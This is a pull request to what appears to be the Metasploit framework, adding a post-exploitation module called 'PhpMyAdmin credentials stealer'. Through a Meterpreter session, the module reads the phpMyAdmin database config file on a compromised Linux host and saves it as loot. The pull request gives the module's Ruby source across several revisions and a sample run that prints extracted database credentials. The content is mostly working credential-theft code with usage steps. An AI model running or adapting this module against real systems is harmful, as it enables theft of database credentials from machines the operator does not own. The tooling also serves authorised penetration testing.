### PR TITLE
Add phpmyadmin password extractor

### DIFF
--- a/documentation/modules/post/linux/gather/phpmyadmin_credsteal.md
+++ b/documentation/modules/post/linux/gather/phpmyadmin_credsteal.md
@@ -1,0 +1,50 @@
+## Description
+
+This post module gathers PhpMyAdmin Creds from target Linux machine.
+
+* https://www.phpmyadmin.net/downloads/ [Download URL]
+
+## Verification Steps
+
+1. Start `msfconsole`
+2. Get a session
+3. Do: `use post/linux/gather/phpmyadmin_credsteal`
+4. Do: `set SESSION [SESSION]`
+5. Do: `run`
+
+## Scenarios
+
+```
+msf exploit(multi/handler) > [*] Sending stage (857352 bytes) to 127.0.0.1
+[*] Meterpreter session 1 opened (127.0.0.1:4444 -> 127.0.0.1:46066) at 2018-08-18 14:46:52 -0400
+
+msf exploit(multi/handler) > use post/linux/gather/phpmyadmin_credsteal
+msf post(linux/gather/phpmyadmin_credsteal) > set SESSION 1
+SESSION => 1
+msf post(linux/gather/phpmyadmin_credsteal) > exploit
+
+[+] PhpMyAdmin config found!
+[+] Extracting config file!
+
+<?php
+##
+## database access settings in php format
+## automatically generated from /etc/dbconfig-common/phpmyadmin.conf
+## by /usr/sbin/dbconfig-generate-include
+##
+## by default this file is managed via ucf, so you shouldn't have to
+## worry about manual changes being silently discarded.  *however*,
+## you'll probably also want to edit the configuration file mentioned
+## above too.
+##
+$dbuser='phpmyadmin';
+$dbpass='Passw0rd';
+$basepath='';
+$dbname='phpmyadmin';
+$dbserver='localhost';
+$dbport='3306';
+$dbtype='mysql';
+
+[*] Post module execution completed
+msf post(linux/gather/phpmyadmin_credsteal) >
+```

--- a/modules/post/linux/gather/phpmyadmin_credsteal.rb
+++ b/modules/post/linux/gather/phpmyadmin_credsteal.rb
@@ -25,7 +25,7 @@ class MetasploitModule < Msf::Post
         ],
       'Author'               => [
         'bofheaded',
-        'Dhiraj Mishra'
+        'Dhiraj Mishra <dhiraj@notsosecure.com>'
         ]
     ))
 

--- a/modules/post/linux/gather/phpmyadmin_credsteal.rb
+++ b/modules/post/linux/gather/phpmyadmin_credsteal.rb
@@ -4,27 +4,29 @@
 ##
 
 class MetasploitModule < Msf::Post
+
   include Msf::Post::File
   include Msf::Post::Linux::Priv
   include Msf::Post::Linux::System
 
   def initialize(info={})
     super(update_info(info,
-      'Name'                 => "PhpMyAdmin credentials stealer",
-      'Description'          => %q{
+      'Name'         => "PhpMyAdmin credentials stealer",
+      'Description'  => %q{
         This module gathers PhpMyAdmin Creds from Target Linux machine.
       },
-      'License'              => MSF_LICENSE,
-      'Platform'             => ['linux'],
-      'Privileged'     => 'true', #This requires root privileges
-      'SessionTypes'         => ['meterpreter'],
-      'Arch'       => 'x86_x64',
-      'References'            =>
+      'License'      => MSF_LICENSE,
+      'Platform'     => ['linux'],
+      'SessionTypes' => ['meterpreter'],
+      'Arch'         => 'x86_x64',
+      'Privileged'   => 'true',
+      'References'   =>
         [
           [ 'CVE', '0000-0000' ] # This module does not require any CVE this was added to pass msftidy.
+
         ],
       'Author'               => [
-        'bofheaded',
+        'Chaitanya Haritash [bofheaded]',
         'Dhiraj Mishra <dhiraj@notsosecure.com>'
         ]
     ))
@@ -36,7 +38,10 @@ class MetasploitModule < Msf::Post
    end
 
   def run
-    print_line('PhpMyAdmin Creds Stealer')
+
+    sess = client
+    print_line("\nPhpMyAdmin Creds Stealer!\n")
+    cred_dump = ""
 
     if session.platform.include?("windows")
       print_error("This Module is not Compatible with Windows")
@@ -44,23 +49,19 @@ class MetasploitModule < Msf::Post
     end
 
     conf_path= "/etc/phpmyadmin/config-db.php"
-    unless file_exist?(conf_path)
-      vprint_error("#{conf_path} doesn't exist on target")
+    if file_exist?(conf_path) == false
+      print_error("#{conf_path} doesn't exist on target")
       return
     end
 
     print_good('PhpMyAdmin config found!')
-    print_good("Extracting config file!\n")
+    print_good("Extracting Creds")
     res = read_file(conf_path)
-    print_line res
-    vprint_good("#{peer} - #{res.body}")
-    path = store_loot(
-      'phpmyadmin.credsteal',
-      'text/plain',
-      ip,
-      res.body,
-      filename
-    )
-    print_good("File saved in: #{path}")
+
+    cred_dump << res
+    store_loot("phpmyadmin_conf","text/plain",sess,cred_dump,"phpmyadmin_conf.txt","phpmyadmin_conf")
+    print_good("Storing dump in ~/.msf4/loot/")
+    print_status("Extracted Creds ::\n")
+    print_line(res)
   end
 end

--- a/modules/post/linux/gather/phpmyadmin_credsteal.rb
+++ b/modules/post/linux/gather/phpmyadmin_credsteal.rb
@@ -11,21 +11,15 @@ class MetasploitModule < Msf::Post
 
   def initialize(info={})
     super(update_info(info,
-      'Name'         => "PhpMyAdmin credentials stealer",
+      'Name'         => "Phpmyadmin credentials stealer",
       'Description'  => %q{
-        This module gathers PhpMyAdmin Creds from Target Linux machine.
+        This module gathers Phpmyadmin creds from target linux machine.
       },
       'License'      => MSF_LICENSE,
       'Platform'     => ['linux'],
       'SessionTypes' => ['meterpreter'],
       'Arch'         => 'x86_x64',
-      'Privileged'   => 'true',
-      'References'   =>
-        [
-          [ 'CVE', '0000-0000' ] # This module does not require any CVE this was added to pass msftidy.
-
-        ],
-      'Author'               => [
+      'Author'       => [
         'Chaitanya Haritash [bofheaded]',
         'Dhiraj Mishra <dhiraj@notsosecure.com>'
         ]
@@ -39,17 +33,16 @@ class MetasploitModule < Msf::Post
 
   def run
 
-    sess = client
     print_line("\nPhpMyAdmin Creds Stealer!\n")
     cred_dump = ""
 
     if session.platform.include?("windows")
-      print_error("This Module is not Compatible with Windows")
+      print_error("This module is not compatible with windows")
       return
     end
 
     conf_path= "/etc/phpmyadmin/config-db.php"
-    if file_exist?(conf_path) == false
+    unless file_exist?(conf_path)
       print_error("#{conf_path} doesn't exist on target")
       return
     end
@@ -59,9 +52,7 @@ class MetasploitModule < Msf::Post
     res = read_file(conf_path)
 
     cred_dump << res
-    store_loot("phpmyadmin_conf","text/plain",sess,cred_dump,"phpmyadmin_conf.txt","phpmyadmin_conf")
-    print_good("Storing dump in ~/.msf4/loot/")
-    print_status("Extracted Creds ::\n")
-    print_line(res)
+    p = store_loot('phpmyadmin_conf', 'text/plain', session, cred_dump, 'phpmyadmin_conf.txt', 'phpmyadmin_conf')
+    print_good("Credentials saved in #{p}")
   end
 end

--- a/modules/post/linux/gather/phpmyadmin_credsteal.rb
+++ b/modules/post/linux/gather/phpmyadmin_credsteal.rb
@@ -53,7 +53,6 @@ class MetasploitModule < Msf::Post
     print_good("Extracting config file!\n")
     res = read_file(conf_path)
     print_line res
-    
     vprint_good("#{peer} - #{res.body}")
     path = store_loot(
       'phpmyadmin.credsteal',

--- a/modules/post/linux/gather/phpmyadmin_credsteal.rb
+++ b/modules/post/linux/gather/phpmyadmin_credsteal.rb
@@ -1,0 +1,56 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Post
+  include Msf::Post::File
+  include Msf::Post::Linux::Priv
+  include Msf::Post::Linux::System
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'                 => "PhpMyAdmin credentials stealer",
+      'Description'          => %q{
+        This module gathers PhpMyAdmin Creds from Target Linux machine.
+      },
+      'License'              => MSF_LICENSE,
+      'Platform'             => ['linux'],
+      'SessionTypes'         => ['meterpreter'],
+      'Arch'       => 'x86_x64',
+      'References'            =>
+        [
+          [ 'CVE', '0000-0000' ] # This module does not require any CVE this was added to pass msftidy.
+        ],
+      'Author'               => [
+        'bofheaded',
+        'Dhiraj Mishra'
+        ]
+    ))
+
+    register_options(
+      [
+        OptString.new('SESSION', [ true, 'The session number to run this module on'])
+      ])
+   end
+
+  def run
+    print_line('PhpMyAdmin Creds Stealer')
+
+    if session.platform.include?("windows")
+      print_error("This Module is not Compatible with Windows")
+      return
+    end
+
+    conf_path= "/etc/phpmyadmin/config-db.php"
+    unless file_exist?(conf_path)
+      vprint_error("#{conf_path} doesn't exist on target")
+      return
+    end
+
+    print_good('PhpMyAdmin config found!')
+    print_good("Extracting config file!\n")
+    res = read_file(conf_path)
+    vprint_line res
+  end
+end

--- a/modules/post/linux/gather/phpmyadmin_credsteal.rb
+++ b/modules/post/linux/gather/phpmyadmin_credsteal.rb
@@ -16,6 +16,7 @@ class MetasploitModule < Msf::Post
       },
       'License'              => MSF_LICENSE,
       'Platform'             => ['linux'],
+      'Privileged'     => 'true', #This requires root privileges
       'SessionTypes'         => ['meterpreter'],
       'Arch'       => 'x86_x64',
       'References'            =>
@@ -51,6 +52,6 @@ class MetasploitModule < Msf::Post
     print_good('PhpMyAdmin config found!')
     print_good("Extracting config file!\n")
     res = read_file(conf_path)
-    vprint_line res
+    print_line res
   end
 end

--- a/modules/post/linux/gather/phpmyadmin_credsteal.rb
+++ b/modules/post/linux/gather/phpmyadmin_credsteal.rb
@@ -18,7 +18,6 @@ class MetasploitModule < Msf::Post
       'License'      => MSF_LICENSE,
       'Platform'     => ['linux'],
       'SessionTypes' => ['meterpreter'],
-      'Arch'         => 'x86_x64',
       'Author'       => [
         'Chaitanya Haritash [bofheaded]',
         'Dhiraj Mishra <dhiraj@notsosecure.com>'

--- a/modules/post/linux/gather/phpmyadmin_credsteal.rb
+++ b/modules/post/linux/gather/phpmyadmin_credsteal.rb
@@ -53,5 +53,15 @@ class MetasploitModule < Msf::Post
     print_good("Extracting config file!\n")
     res = read_file(conf_path)
     print_line res
+    
+    vprint_good("#{peer} - #{res.body}")
+    path = store_loot(
+      'phpmyadmin.credsteal',
+      'text/plain',
+      ip,
+      res.body,
+      filename
+    )
+    print_good("File saved in: #{path}")
   end
 end


### PR DESCRIPTION
## Description

This post module gathers PhpMyAdmin Creds from target Linux machine.

## Verification Steps

1. Start `msfconsole`
2. Get a session
3. Do: `use post/linux/gather/phpmyadmin_credsteal`
4. Do: `set SESSION [SESSION]`
5. Do: `run`

```
msf exploit(multi/handler) > [*] Sending stage (857352 bytes) to 127.0.0.1
[*] Meterpreter session 1 opened (127.0.0.1:4444 -> 127.0.0.1:46066) at 2018-08-18 14:46:52 -0400

msf exploit(multi/handler) > use post/linux/gather/phpmyadmin_credsteal
msf post(linux/gather/phpmyadmin_credsteal) > set SESSION 1
SESSION => 1
msf post(linux/gather/phpmyadmin_credsteal) > exploit

[+] PhpMyAdmin config found!
[+] Extracting config file!

<?php
##
## database access settings in php format
## automatically generated from /etc/dbconfig-common/phpmyadmin.conf
## by /usr/sbin/dbconfig-generate-include
##
## by default this file is managed via ucf, so you shouldn't have to
## worry about manual changes being silently discarded.  *however*,
## you'll probably also want to edit the configuration file mentioned
## above too.
##
$dbuser='phpmyadmin';
$dbpass='Passw0rd';
$basepath='';
$dbname='phpmyadmin';
$dbserver='localhost';
$dbport='3306';
$dbtype='mysql';

[*] Post module execution completed
msf post(linux/gather/phpmyadmin_credsteal) >
```

Tested on : NixOS
PhpMyAdmin Download : https://www.phpmyadmin.net/downloads/